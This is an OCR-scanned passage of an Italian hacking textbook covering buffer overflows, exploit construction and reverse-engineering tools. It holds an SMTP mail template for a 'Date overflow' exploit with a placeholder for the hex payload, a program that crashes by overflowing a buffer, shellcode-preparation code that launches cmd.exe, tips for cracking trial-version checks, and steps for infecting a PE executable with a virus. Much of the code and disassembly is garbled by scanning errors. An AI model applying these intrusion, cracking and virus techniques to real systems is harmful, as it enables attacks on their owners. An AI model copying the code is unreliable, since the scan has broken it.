
La testata del messaggio era ad esempio: 

helo dominio.it 

mail from: flavio@websitek . com 
rcpt to: somedest@mail . it 
data 

Date: Sun, 7 May 2000 11:20:46 +[~1000bytes vuoti + I codici dell' exploit in HEX] 
Subject: Date overflow! 
Importance : high 
MIME-Version : 1.0 

Content—Type : text/plain; charset= us ascii 

Questo è il testo del messaggio. 

quit 

Vi ricordo che tale testo potrebbe essere anche digitato manualmente da TELNET utilizzando 
come stringa di comando ; 

C:\> telnet i p_de 1 1 a_vitti m a 25 

I codici espressi tra parentesi quadre dopo la data sono appunto quelli relativi al codice 
malefico. 

Nel caso di buffer overflow orientati a fare inchiodare i programmi è molto semplice mostrane 
il funzionamento. 

Prendete i seguente codice, compilatelo ed eseguitelo. 

char buffer [1024]; 

void main (void) 
{ 

int i; 

for (i=0; i ! =1280; 

buffer [I] = 'A' ; 

ì 

Compilatelo in ambiente Linux e vedrete dopo averlo eseguito il messaggio di segmentation 
fault. 

II discorso invece legato al fatto di forzare un determinato codice ad essere eseguito può 
essere eseguito tramite manipolazioni dentro allo stack. 

Cosa significa questo ? 

Sapete che dentro a questo segmento vengono memorizzate le variabili locali alle funzioni ed 
in particolar modo gli indirizzi di ritorno delle funzioni. 

Ora se in qualche modo viene manipolato il contenuto di una variabile memorizzata dentro 
allo stack fino a fare soprascrivere l'indirizzo di ritorno della funzione chiamata che esegue 
l'input si otterrà che quando l'esecuzione della funzione stessa termina questa eseguirà un 
salto ad un punto che non è più quello memorizzato all'atto della cali. 

In molti sistemi operativi basati su System V utilizzanti la libreria standard LIBC si sono 
verificati dei problemi legati a queste metodologie di creazione dei buffer overflow. 
Vedremo successivamente questo argomento legato alla libreria libc. 

Indipendentemente comunque dal fatto dell'identificazione di alcune caratteristiche a basso 
livello dei software, l'uso di questi strumenti è importante anche per un altro motivo. 
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Rimando sempre collegati al discorso dei buffers overflow, anche se di fatto abbiamo detto 
che molti di questi sono legati alla gestione dello stack e dell'heap e che quindi possono 
essere considerati indipendentemente dall'uso di debugger e disassemblatori, questi 
strumenti in ogni caso mantengono la loro importanza in quanto la scrittura degli exploits 
deve passare sempre da questi. 

Nei capitoli in cui vengono trattati i problemi dello stack in relazione ai buffer overflow, 
abbiamo visto come di fatto le stringhe da inserire nei buffer stessi vengono gestite mediante 
l'uso di uno di quelli che possono essere considerati come debugger classici per l'ambiente 
Linux, ovvero GDB. 

Scrivere un programma in assembler da usare per explottare una risorsa e successivamente 
vederlo in formato esadecimale al fine di poterlo inserire dentro a qualche array di un buffer, 
può essere eseguito in tanti modi differenti. 

Il primo è sicuramente il migliore per quello che riguarda l'ottimizzazione. 
Scrivere un programma in linguaggio C e successivamente compilarlo ed poi vederlo in 
assembler, come l'ha creato il compilatore, significa trovare dentro a questo moltissime 
istruzioni che il compilatore stesso ha inserito nel suo tentativo di generalizzare la traduzione. 
In altre parole un programma scritto direttamente in assembler è sempre più ottimizzato. 
E' facile fare una prova. 

Supponiamo di dover scrivere un piccolo programmino che attivi il CMD.EXE presente sotto 
\windows\system32. 

Il programma scritto in linguaggio C potrebbe essere : 
#include <stdio.h> 



void main() 
{ 

char *name[2]; 

name[0] = "e:\\winnt\\system32\\cmd.exe"; 
name[1] = NULL; 
execve(name[0], name, NULL); 

} 

Ora se volessimo potremmo compilarlo con 



Ora carichiamo IDA e disassembliamo test.exe creato dalla compilazione. 

Ci troveremo davanti ad un programma enorme in quanto il compilatore crea tutta una parte 

di codice legato al settaggio dell'ambiente. 

La funzione che effettivamente esegue la cali a exec viene messa da una parte esterna: 



00401000 sub_401000 


proc near 


; CODE 


XREF: start+AF-p 


00401000 








00401000 


var_8 


= dword ptr - 


8 


00401000 


var_4 


= dword ptr - 


4 


00401000 








00401000 83 EC 08 


sub 


esp, 8 




00401003 8D 44 24 00 


lea 


eax, [ esp+8+var_ 


81 


00401001 6A 00 


push 


0 




00401009 50 


push 


eax 




0040100A 68 30 60 40 


OOpush offset 


aEWlnntSystem32 ; 




"e : \ \wlnnt \ \system32\ \cmd. exe " 






0040100F CI 44 24 OC 


30 60+ mov 


[ esp+1 4h+var_8] , 


offset 


aEW±nntSystem32 ; "e: 


\ \ wlnnt \ \system32\ \cmd. exe " 




00401011 CI 44 24 10 


00 00+ mov 


[esp+14h+var_4 ] , 


0 


0040101F E8 12 35 00 


00 cali 


execve 




00401024 83 C4 14 


add 


esp, 14h 




00401021 C3 


retti 
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E fino a questo punto potrebbe anche non andare male. 
Ma guardate un po il resto .... 



00401030 55 
00401030 
00401030 
00401030 
00401030 
00401030 
00401030 
00401030 
00401030 
00401030 
sub_401030 



start 

var_20 
var_lC 
var_18 
var_14 
var 4 



public start 
proc near 

= dword ptr -2 Oh 
= dword ptr -lCh 
= dword ptr -18h 
= dword ptr -14h 
= dword ptr -4 



push 



ebp 



00401031 


8B 


EC 










mov 


ebp, esp 




00401033 


6A 


FF 










push 


OFFFFFFFFh 




00401035 


68 


B8 


50 


40 


00 




push 


offset stru_4050Bi 


0040103A 


68 


8C 


1C 


40 


00 




push 


offset except_hc 


0040103F 


64 


Al 


00 


00 


00 


00 


mov 


eax, large fs 


■0 


00401045 


50 












push 


eax 




00401046 


64 


89 


25 


00 


00 


00+ 


mov 


large fs:0, esp 


0040104D 


83 


EC 


10 








sub 


esp, 1 Oh 




00401050 


53 












push 


ebx 




00401051 


56 












push 


esi 




00401052 


57 












push 


edi 




00401053 


89 


65 


E8 








mov 


[ebp+var_18] , 


esp 


00401056 


FF 


15 


04 


50 


40 


00 


cali 


ds : GetVersion 


r 


current verslon number of Windows 








00401056 


















r 


Information 


about 


the operating system platform 






0040105C 


33 


D2 










xor 


edx, edx 




0040105E 


8A 


D4 










mov 


di, ah 




00401060 


89 


15 


84 


86 


40 


00 


mov 


dword_408684, 


edx 


00401066 


8B 


C8 










mov 


ecx, eax 




00401068 


81 


El 


FF 


00 


00 


00 


and 


ecx, OFFh 




0040106E 


89 


OD 


80 


86 


40 


00 


mov 


dword_408680, 


ecx 


00401074 


CI 


El 


08 








shl 


ecx, 8 




00401077 


03 


CA 










add 


ecx, edx 




00401079 


89 


OD 


7C 


86 


40 


00 


mov 


dword_40867C, 


ecx 


0040107F 


CI 


E8 


10 








shr 


eax, lOh 




00401082 


A3 


78 


86 


40 


00 




mov 


dword_408678, 


eax 


00401087 


6A 


00 










push 


0 




00401089 


E8 


A8 


OA 


00 


00 




cali 


sub_401B36 




0040108E 


59 












pop 


ecx 




0040108F 


85 


CO 










test 


eax, eax 




00401091 


75 


08 










jnz 


short loc_40109B 


00401093 


6A 


1C 










push 


lCh 




00401095 


E8 


9A 


00 


00 


00 




cali 


sub_401134 


r 


_fast_error_ 


_exit 














0040109A 


59 












pop 


ecx 





Get 



and 



0040109B 

0040109B loc_40109B: 

XREF: start+61'j 

0040109B 83 65 FC 00 

0040109F E8 72 07 00 00 

004010A4 FF 15 00 50 40 00 

004010AA A3 78 8B 40 00 

004010AF E8 30 06 00 00 

crtGetEnvironmentStringsA 

004010B4 A3 60 86 40 00 
004010B9 E8 D9 03 00 00 
004010BE E8 1B 03 00 00 
004010C3 E8 90 00 00 00 
004010C8 Al 94 86 40 00 
004010CD A3 98 86 40 00 
74010D2 50 



CODE 



and [ebp+var_4] , 0 

cali ioinit 

cali ds : GetCommandLineA 

mov dword_408B78, eax 
cali 

mov dword_408660, eax 

cali setargv 

cali setenvp 

cali cinit 

mov eax, dword_408694 

mov dword_408698, eax 

oush ea 
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004010D9 


FF 


35 88 86 40 


00 


push 


dword 408688 


004010DF 


E8 


1C FF FF FF 




cali 


sub_401000 


004010E4 


83 


C4 OC 




add 


esp, OCh 


004010E7 


89 


45 E4 




mov 


[ ebp+var_ 1C] , eax 


004010EA 


50 






push 


eax 


004010EB 


E8 


95 00 00 00 




cali 


_ex.it 


004010F0 
















f 






004010F0 












004010F0 






loc_4010F0 : 




; DATA 


XREF: .rdata:004050B8'o 








004010F0 


8B 


45 EC 




mov 


eax, [ebp-1 4h ] 


004010F3 


8B 


08 




mov 


ecx, [eax ] 


004010F5 


8B 


09 




mov 


ecx, [ecx ] 


004010F7 


89 


4D EO 




mov 


[ebp-20h ] , ecx 


004010FA 


50 






push 


eax 


004010FB 


51 






push 


ecx 


004010FC 


E8 


59 01 00 00 




cali 


XcptFilter 


00401101 


59 






pop 


ecx 


00401102 


59 






pop 


ecx 


00401103 


C3 






retn 





Pur non essendoci argomenti passati il compilatore ha messo le funzioni per leggere gli 
eventuali. 

In ogni caso sarebbe assurdo usare un codice cosi per la gestione dell'exploit. 

A dire il vero è il linker che si modifica il codice anche perché provate a vedere quello che 

segue. 

Il compilatore C Microsoft possiede un flag che permette di generare direttamente il codice 

asembler. 

Se avessimo dato : 

ci -Fatest.asm -Ox test.c 

Il risultato sarebbe : 

TITLE test . c 
.386P 

Include listing. ine 
if QVersion gt 510 
.model FIAT 
else 

_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
TEXT ENDS 

_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 

CONST SEGMENT DWORD USE32 PUBLIC ' CONST ' 
CONST ENDS 

_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 

_TLS SEGMENT DWORD USE32 PUBLIC ' TLS ' 
_TLS ENDS 

FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS : FLAT, DS : FLAT, SS : FLAT 

endif 

PUBLIC _main 

EXTRN _execve:NEAR 

_DATA SEGMENT 

$SG829 DB ' e : \ winnt \ system32 \ cmd . exe ' , 00H 

_DATA ENDS 

_TEXT SEGMENT 

_name$ = -8 

_main PROC NEAR 

; File test . c 

; Line 5 

sub esp, 8 
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; Line 9 
lea 
push 
push 
push 
mov 
mov 
cali 

; Line 1 1 
add 
ret 

_main ENDP 
TEXT ENDS 

END 



eax, DWORD PTR _name$ [esp+8] 
0 

eax 

OFFSET FLAT:$SG829 

DWORD PTR _name$[esp+20] , OFFSET FLAT:$SG829 
DWORD PTR _name$[esp+24] , 0 
execve 



esp, 
0 



20 



00000014H 



Come potete vedere qui le cose sono ben diverse. 

In ogni caso il tutto era stato riportato per fare capire come di fatto la manipolazione dei 
programmi con gli strumenti da cracker sia di fatto spesso un attività con cui ci si deve avere 
una certa dimestichezza al fine di potere scegliere il sistema migliore per svolgere certe 
funzioni. 

Quando si parla di questo tipo di attività si riporta sempre come strumento principe SOFTICE 
anche se ultimamente grazie alla mancanza di compatibilità con Windows XP questo è 
passato un po' di moda. 

In compenso sono sempre presenti sul mercato disassemblatori come IDA o disassemblatori 

e debuggers come OLLYDBG e uno che ho scoperto recentemente chiamato GoVest!. 

Il disassemblatore si differenzia dal debugger per il fatto che il primo grazie a più passate di 

analisi riesce a ricostruire un formato di programma più simile quello creato nel linguaggio 

originario. 

Il debugger invece possiede una maggiore specializzazione per quello che riguarda il fatto di 
seguire l'esecuzione dinamica del programma. 
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GoVest visualizza sia il codice assemblativo che quello espresso come OPCODE. 

Oltre a questo il programma visualizza i dati dei registri del processore, le DLL lette in 

memoria abbinate al programma e i dati dentro ad un data segment. 

Un debugger disassemblatore che ho sempre apprezzato è OLLYDBG il quale somiglia 
abbastanza a questo appena visto e che comunque dispone di un numero molto elevato di 
funzioni che riescono a modificare i parametri di analisi e di ricostruzione del codice. 
OLLYDBG contempla diversi metodi di analisi tra cui uno basato su un sistema di FUZZY 
LOGIC. 
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Chiaramente a noi il fattore di ricostruzione del codice importa moltissimo in quanto dovremo 
riuscire ad identificare le zone dove vengono memorizzate determinate informazioni, i punti in 
cui vengono imputati i dati e cosi via. 

Anche WDASM è sempre stato un ottimo debugger con funzioni da disassemblatore e anche 
se di fatto dall'ultima versione sono passati un po' di anni rimane sempre un ottimo 
strumento. 
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Per quanto riguarda i disassemblatori sicuramente IDA rimane il programma più potente. 
Quando scriviamo un programma utilizzando un determinato linguaggio utilizziamo sempre 
dei riferimenti simbolici sia per riferirci a delle variabile che per quello che riguarda la 
chiamata a funzioni. 

Chiaramente le variabili sono allocate in memoria e lo stesso dicasi per le funzioni. 
Istruzioni che vediamo in formato simbolico nel seguente formato : 




sono tradotte in assembler con : 



00400001 



DW 



e 



chiama_funzione() 



con 

004010CB public chiama funzione 

004010CB chiama_funzione proc near 



Questa ricostruzione lascia ancora vedere I riferimenti simbolici. 

Guardando con un debugger il programma ci accorgeremmo che una funzione inizia in un 
determinato punto solo per il fatto che da qualche parte esiste una determinata cali a 
quell'indirizzo. 
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La stessa cosa dicasi per quello che riguarda la fine di una funzione la quale verrebbe 

identificata solo per il fatto che su una determinata linea esiste un RET. 

Il disassemblatore facendo più passate rispetto il debugger riesce a ricostruire il programma 

in un formato più simile a quello che era l'originale lasciando intravedere dei riferimenti 

simbolici. 

Chiaramente questi verranno rappresentati da nomi inventati dal disassemblatore in quel 
momento in quanto una programma una volta linkato non contiene più nessun riferimento che 
permetta di ritornare ai nomi originali delle funzioni e della variabili. 

Il disassemblatore professionale esegue un certo numero di passate individuando il nome 
delle API relative a DLL collegate tramite librerie ai programmi come ad esempio potrebbe 
essere quella delle Microsoft Foundation Class (MFC) del Linguaggio C o la libreria del Visual 
Basic. 

Il debugger ha come scopo quello di visualizzare il codice dinamicamente per cui quello che 

viene visualizzato è quello che in queir istante è presente in memoria. 

In questo settore si sta sentendo la mancanza di Softlce in quanto la differenza di questo 

dagli altri debugger sta nel fatto che questo possiede un numero esagerato di breakpoint 

inseribili. 

Che cosa sono i breakpoint ? 

Sono punti in cui per qualche motivo il programma interrompe l'esecuzione permettendo 
all'utente di visualizzare lo stato della macchina e offrendo la possibilità di proseguire 
l'esecuzione passo a passo. 

Normalmente i debugger possiedono un breakpoint legato all'indirizzo di memoria. 

In altre parole il programma quando arriva ad un certo indirizzo si ferma. 

In alcuni casi esistono anche dei tipi di breakpoint che permettono di interrompere 

l'esecuzione a seguito della valutazione di una variabile o di una locazione di memoria. 

Softlce dispone di breakpoint legati a qualsiasi cosa come ad esempio relativi alla chiamata di 

una certa funzione. 

Sicuramente nel campo del cracking questa è una possibilità indispensabile in quanto se si 
volesse intercettare il punto in cui un applicazione visualizza una finestra di dialogo con 
dentro un messaggio atto ad avvisare che il programma è in versione TRIAL, l'esecuzione 
della ricerca del punto dove questa calla avviene sarebbe difficile da fare in altro modo. 
Oltre a questo Softlce dispone di test sulle porte hardware e molti altri tipi senza considerare 
che esiste internamente anche un linguaggio che permette di creare costrutti complessi di 
valutazione. 

Difficilmente nel campo dell'hacking avremo la necessità di usare Softlce a tutti i costi in 
quanto il tipo di ricerche da fare sono possibili anche con debugger meno sofisticati e con 
tanto di interfaccia Windows. 

Parlo di interfaccia grafica in quanto Softlce dispone di una vecchia interfaccia DOS ma 
questo per motivi pratici in quanto mentre un altro debugger disassembla i programmi passati 
come argomenti, Softlce permette anche di entrare e vedere il codice in esecuzione di 
Windows e dei drivers. 

Per fare questo un apposito device si piazza prima della gestione fatta da Windows per cui la 
visualizzazione delle informazioni di debug vengono fatte con interfaccia a carattere. 
La guerra del cracker è contro le protezione per cui gli strumenti usati da questi sono molto 
più sofisticati in quanto contemplano anche scompattatori di codice relativi ai vari modelli di 
compressione segmenti usati dai vari software di protezione. 

Al fine di rendere la vita difficile al cracker i sistemi di protezione codificano i segmenti di 

codice in modo tale che la ricerca delle routines di controllo sia molto più complesso. 

Inoltre sapendo che quelli che cercano di sproteggere i programmi utilizzano i debuggers, 

all'interno dei software protetti possono esserci dentro sistemi per bloccarli. 

Di conseguenza tra i vari strumenti del cracker esistono sistemi atti a confondere le 

protezioni. 

Come dicevo prima è difficile che i software ce dovremo analizzare dispongano di simili 
metodi per cui per quello che ci serve un debugger buono e un disassemblatore è quello che 
ci serve. 

Un altro strumento comune alle attività dell'hacker e del cracker è l'editor esadecimale. 
L'analisi del codice lo eseguiremo sempre seguendo le istruzioni assembler ma alla fine la 
codifica delle modifiche da inserire nei buffers dovranno essere fatte mediante la specifica in 
esadecimale dei codici operativi. 
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Strumenti come IDA possono visualizzare sulla stessa linea sia la forma assembler che 
quella degli OPCODE. 

Andando nelle opzioni generali di IDA potremo specificare il numero di bytes riservati sul 
video alla visualizzazione dei codici operativi. 
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Ad esempio specificando 8 BYTES vedremo il codice nel seguente modo. 



00401050 












push 


ebx 


00401051 


56 










push 


esi 


00401052 


BE 


AO 


70 


40 


00 


mov 


esi, offset unk_4070A0 


00401051 


57 










push 


edi 


00401058 


56 










push 


esi 


00401059 


E8 


95 


01 


00 


00 


cali 


stbuf 


0040105E 


SS 


F8 








mov 


edi , eax 


00401060 


8D 


44 


24 


18 




lea 


eax, [esp+8+arg_4] 


00401064 


50 










push 


eax 


00401065 


FF 


74 


24 


18 




push 


[ esp+OCh+arg_0] 


00401069 


56 










push 


esi 



Chiaramente la ricerca e la scrittura di quelli che sono definiti con il termine di BUFFERS 
OVERFLOW sono tra le metodologie più complesse in quanto pretendono diverse 
conoscenze compresi i vari linguaggi assembler relativi alle varie architetture hardware. 
Per reintrodursi al discorso dei buffers overflows dobbiamo richiamare i concetti visti 
nell'ambito del capitolo legato al linguaggio assembler. 

Uno degli strumenti essenziali necessari per ricavare le informazioni legate ai programmi 
eseguibili è quello definito con il termine di PE Explorer. 

Il files eseguibili possiedono in testa una struttura con all'interno moltissime informazioni tra 
cui tutte quelle legate alla rilocazione del programma quando questo viene letto in memoria. 
Dentro a questo header esistono altre informazioni legate ai segmenti come ad esempio lo 
stack. 

L'analisi di quello che viene definito con il termine di PE header è essenziale per quello che 
riguarda l'installazione dentro a dei programmi di virus o cose di questo tipo. 
Tra le varie informazioni riportate esiste quella legata all'entry point ovvero del punto dove il 
programma inizierà la sua esecuzione. 

Quando un Virus viene incluso dentro ad un file eseguibile deve essere seguita una 
determinata metodologia e precisamente : 

• Viene letto l'entrypoint e viene memorizzato facendo in modo che l'ultima istruzione 
del virus esegua un salto a quest'indirizzo. 



• Il virus viene accodato al file eseguibile dopo che da qualche parte viene 
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Facendo tutto questo quando il programma viene eseguito la lettura dell'entrypoint farà si che 
l'esecuzione parta all'offset di dove si trova il Virus. 

Questo viene eseguito e quindi alla fine, l'ultima istruzione del Virus, verrà lanciato il resto del 
programma saltando al vecchio entrypoint. 

Un programma che mostra le informazioni del PE è quello che segue: 

// PEINFO.H 

typedef unslgned long dword; 
typedef unslgned short Int word; 
typedef unslgned char byte; 

typedef enum { false=0, true} bool; 

tideflne MAX_STRLEN 256 

// 

// PE File Structures 

// 

// IMAGE_FILE_HEADER Expected at start of PE header 

// IMAGE_OPTIONAL_HEADER Additional header detalls . 

// IMAGE_DATA_DIRECTORY Data Dlrectories 

// IMAGE_SECTION_HEADER Sectlon Header detalls 

// IMAGE_ IMPOR T_DIRECTOR Y Import Directory 

// IMAGE_IMPORT_DESCRIPTOR Import Descriptor 

// IMAGE_ IMPOR T_B Y_NAME 

// IMAGE_RELOCATION Relocation Directory 

// 

tidefine PEMAGIC 0x00004550 

Struct IMAGE_FILE_HEADER 

{ word Machine; 

word NumberOfSections; 

dword TimeDateStamp; 

dword PointerToSymbolTable; 

dword NumberOfSymbols; 

word SizeOfOptionalHeader; 

word Characteristics; 

}; 

tidefine IMAGE_NUMBEROF_DIRECTORY_ENTRIES 13 

struct IMAGE_DATA_DIRECTORY 

{ dword VirtualAddress ; 

dword Size; 

}; 

Struct IMAGE_OPTIONAL_HEADER 
{ // 

// Standard fields. 

// 

word Magic; 

byte MajorLinkerVersion; 

byte MinorLinkerVersion; 

dword SizeOfCode; 

dword SizeOflnitializedData; 

dword SizeOfUninitializedData; 

dword AddressOfEntryPoint ; 

dword BaseOfCode; 

dword BaseOfData; 

// 

// NT [Windows] additional fields. 

// 

dword ImageBase; 

dword SectionAlignment; 

dword Fi 1 e Al 1 gnmen t ; 
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word Ma j or Opera t IngSys temVersion; 

word MlnorOpera t IngSystemVersl on ; 

word MajorlmageVersion; 

word MinorlmageVersion; 

word MajorSubsystemVerslon; 

word MinorSubsystemVersion; 

dword Reservedl ; 

dword SizeOflmage; 

dword SizeOfHeaders ; 

dword CheckSum; 

word Subsystem; 

word DllCharacteristics; 

dword SizeOfStackReserve; 

dword SizeOfStackCommit; 

dword SlzeOfHeapReserve; 

dword SlzeOfHeapCommit; 

dword LoaderFlags; 

dword NumberOfRvaAndSizes; 

Struct IMAGE_DATA_DIRECTORY 

DataDirectory [IMAGE_NUMBEROF_DIRECTORY_ENTRIES] ; 



}; 



idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_EXPORT 


0 


// Export Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_IMPORT 


1 


// Import Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_RESOURCE 


2 


// Resource Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_EXCEPTION 


3 


// Exception Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_SECURITY 


4 


// Security Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


BASERELOC 


5 


// Base Relocation Table 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


DEBUG 


6 


// Debug Directory 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


COPYRIGHT 


7 


// Description String 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_GLOBALPTR 


8 


// Machine Value (MIPS GP) 


idefine 


IMAGE_ 


_DIRECTORY_ 


_ENTRY_ 


_TLS 


9 


// TLS Directory 


idefine 


IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 




10 // Load Configuration 



Directory 

idefine IMAGE_DIRECTORY_ENTRY_BOUND_ IMPORT 11 // Bound Import Directory in 
headers 

idefine IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table 

idefine IMAGE_SIZEOF_SHORT_NAME 8 



Struct IMAGE_SECTION_HEADER 
{ byte Name [IMAGE_SIZEOF_SHORT_NAME ] ; 
union 

{ dword PhysicalAddress ; 

dword VirtualSize; 
} Mise; 

dword VirtualAddress; 
dword SizeOfRawData; 
dword PointerToRawData; 
dword PointerToRelocations ; 
dword PointerToLinenumbers ; 
word NumberOfRelocations; 
word NumberOfLinenumbers; 
dword Characteristics ; 



Struct IMAGE_ IMPOR T_DIRECTOR Y 



{ dword 
dword 
dword 
dword 
dword 

}; 



dwRVAFunctionNameList ; 
dwUselessl ; 
dwUseless2 ; 
dwRVAModuleName ; 
dwRVAFunctionAddressList ; 



struct IMAGE_ IMPOR T_DESCRIP TOR 
{ dword OriginalFirstThunk; 
dword TimeDateStamp; 
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dword Name; 
dword FirstThunk; 

}; 

struct IMAGE_ IMPOR T_B Y_NAME 
{ word Hint; 
byte Name[l]; 

}; 

tidefine IMAGE_ORDINAL_FLAG 0x80000000 

tidefine IMAGE_ORDINAL (Ordinai) (Ordinai & Oxffff) 

struct IMAGE_RELOCATION 
{ union 

{ dword VirtualAddress ; 
dword RelocCount; 

in; 

dword SymbolTablelndex; 
word Type; 

}; 

//**************************************^ 
tidefine IMAGE_SIZEOF_RELOCATION 10 

// 

// 1386 relocation types . 

// 

tidefine IMAGE_REL_ 138 6_ABS0L UTE 0x0000 // Reference is absolute, no 
relocation is necessary 

tidefine IMAGE_REL_I386_DIR16 0x0001 // Direct 16-bit reference to the 

symbols virtual address 

tidefine IMAGE_REL_I386_REL16 0x0002 // PC-relative 16-bit reference to 

the symbols virtual address 

tidefine IMAGE_REL_I386_DIR32 0x0006 // Direct 32-bit reference to the 

symbols virtual address 

tidefine IMAGE_REL_I386_DIR32NB 0x0007 // Direct 32-bit reference to the 
symbols virtual address, base not included 

tidefine IMAGE_REL_I386_SEG12 0x0009 // Direct 16-bit reference to the 

segment-selector bits of a 32-bit virtual address 
tidefine IMAGE_REL_I386_SECTION OxOOOA 
tidefine IMAGE_REL_ 138 6_ SECREL OxOOOB 

tidefine IMAGE_REL_I386_REL32 0x0014 // PC-relative 32-bit reference to 

the symbols virtual address 

Il codice vero e proprio è quello che segue : 

// =================================================================== 

// Exe File Information v1 .0 by Cronos 

Il 

// Language: C (DOS) 

// 

// Usage: PEINFO [flags] <exename> 

// 

// Flags: -h :help screen 

// 

// Action: Gives detailed information on PE format. 

// =================================================================== 



// 

// Set-up includes,typedefs,etc 

Il — 

// 
// 
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#include <stdio.h> 
#include <io.h> 
#include <fcntl.h> 
#include <string.h> 
#include <stdlib.h> 
#include "peinfo.h" 

char vers[]="PEINFO v1 .0 by Cronos"; 

struct opt 
{ bool help; 
char file[MAX_STRLEN]; 
} options; 

// 

// initialise 

// - cali before processing the command line 

// 

void initialise(void) 
{ printf("%s\n\n",vers); 

options. help=false; 

options.file[0]=0; 

} 

// 

// PE Library Routines 

// 

// peoffset offset to pe header in file 
// optsize size of optional header 

// shoffset offset to section headers 

// 

struct IMAGE FILE HEADER ifh; 
struct IMAGE OPTIONAL HEADER ioh; 
struct IMAGE SECTION HEADER ish; 

int pefile; 

dword peoffset, shoffset; 
dword optsize; 

void pefileshutdown(void) 

{ close(pefile); 

} 

void pefileinit(void) 

{ char filename[MAX_STRLEN]; 

byte pebuff[1024]; 

int i; 

if ((pefile=open(options.file,0_BINARY))==-1) 
{ strcpy(filename,options.file); 

strcat(filename,".exe"); 

if ((pefile=open(filename,0_BINARY))==-1) 

{ printf("Fatal Error:Can't open : %s\n",options.file); 
exit(1); 

} 

} 

printf("\nOpened file, reading header\n"); 

if(read(pefile,pebuff,0x40)<0x40) 

{ printf("Fatal error:File is not a PE file\n"); 

close(pefile); 

exit(1); 

} 

if(!(((pebuff[0]== , M , )&&(pebuff[1]=='Z , ))||((pebuff[1]=='M , )&&(pebuff[0]=='Z')))) 
{ printf("Fatal Error:File is not an executable file \n") ; 
close(pefile); 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



} 

if(((word *)&pebuff[0x1 8])[0]<0x40) 

{ printf("Fatal Error:DOS reloc table position incorrect for PE file format \n"); 
close(pefile); 
exit(1); 

} 

peoffset=((dword *)&pebuff[0x3c])[0]; 
if(peoffset<0x40) 

{ printf("Fatal Error:No extended header found in executable file \n") ; 
close(pefile); 
exit(1); 

} 

if(lseek(pefile,peoffset,SEEK_SET)==-1) 

{ printf("Fatal Error:Error seeking PE Header\n"); 

close(pefile); 

exit(1); 

} 

if(read(pefile,pebuff,4)!=4) 

{ printf("Fatal Error:Error reading PE magic\n"); 

close(pefile); 

exit(1); 

} 

if(((dword *)pebuff)[0]!=PEMAGIC) 
{ printf("PE Magic not found\n"); 

close(pefile); 

exit(1); 

} 

printf("Found PE Magic, reading header infcAn"); 

if(read(pefile,&ifh,sizeof(ifh))!=sizeof(ifh)) 

{ printf("Fatal Error:Error reading PE header infcAn"); 

close(pefile); 

exit(1); 

} 

printf("Read PE Header, reading optional header\n"); 

optsize=sizeof(ioh)-IMAGE_NUMBEROF_DIRECTORY_ENTRIES*sizeof(struct 
I M AG ED ATAD I R ECTO R Y) ; 
if(read(pefile,&ioh,(int)optsize)!=optsize) 
{ printf("Fatal Error:Error reading PE optional header info\n"); 

close(pefile); 

exit(1); 

} 

for(i=0;i<IMAGE_NUMBEROF_DIRECTORY_ENTRIES;i++) 
{ ioh.DataDirectory[i].VirtualAddress=0; 
ioh.DataDirectory[i].Size=0; 

} 

printf("Read optional header, reading data directory summaries\n"); 

for(i=0;i<ioh.NumberOfRvaAndSizes;i++) 

{ if(read(pefile,&ioh.DataDirectory[i], 

sizeof(struct IMAGE_DATA_DIRECTORY))!=sizeof(struct I M AG ED ATAD I R ECTO R Y)) 
{ printf("Fatal Error:Error reading data directories\n\n"); 

close(pefile); 

exit(1); 

} 

} 

shoffset=peoffset+optsize+sizeof(ifh)+4+ioh.NumberOfRvaAndSizes*sizeof(struct 
I M AG ED ATAD I R ECTO R Y) ; 
printf("\nPE File Header Entries Summary\n"); 

printf(" \n"); 

printf("Machine :0x%0x\n",ifh. Machine); 

printf("NumberOfSections :0x%0x\n",ifh.NumberOfSections); 
printf("TimeDateStamp :Ox%Olx\n",ifh.TimeDateStamp); 
printf("PointerToSymbolTable :Ox%Olx\n",ifh.PointerToSymbolTable); 
printf("NumberOfSymbols :0x%0lx\n",ifh.NumberOfSymbols); 
printf("SizeOfOptionalHeader :0x%0x\n",ifh.SizeOfOptionalHeader); 
printf("Characteristics :Ox%Ox\n",ifh.Characteristics); 
printf("\n"); 
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printf(" \n"); 

printffStandard fields:\n"); 
printf("Magic :0x%x\n",ioh. Magic); 

printf("MajorLinkerVersion :Ox%x\n",ioh.MajorLinkerVersion); 
printf("MinorLinkerVersion :Ox%x\n",ioh.MinorLinkerVersion); 
printf("SizeOfCode :0x%lx\n",ioh.SizeOfCode); 
printf("SizeOflnitializedData :0x%lx\n",ioh.SizeOflnitializedData); 
printf("SizeOfUninitializedData :0x%lx\n",ioh.SizeOfUninitializedData); 
printf("AddressOf Entry Point :0x%lx\n",ioh.AddressOfEntryPoint); 
printf("BaseOfCode :0x%lx\n",ioh.BaseOfCode); 
printf("BaseOfData :0x%lx\n",ioh.BaseOfData); 
printf("NT [Windows] additional fields:\n"); 
printf("lmageBase :Ox%lx\n",ioh.lmageBase); 
printf("SectionAlignment :Ox%lx\n",ioh.SectionAlignment); 
printf("FileAlignment :Ox%lx\n",ioh.FileAlignment); 

printf("MajorOperatingSystemVersion:0x%x\n",ioh.MajorOperatingSystemVersion); 
printf("MinorOperatingSystemVersion:0x%x\n",ioh.MinorOperatingSystemVersion); 
printf("MajorlmageVersion :Ox%x\n",ioh.MajorlmageVersion); 
printf("MinorlmageVersion :Ox%x\n",ioh.MinorlmageVersion); 
printf("MajorSubsystemVersion :Ox%x\n",ioh.MajorSubsystemVersion); 
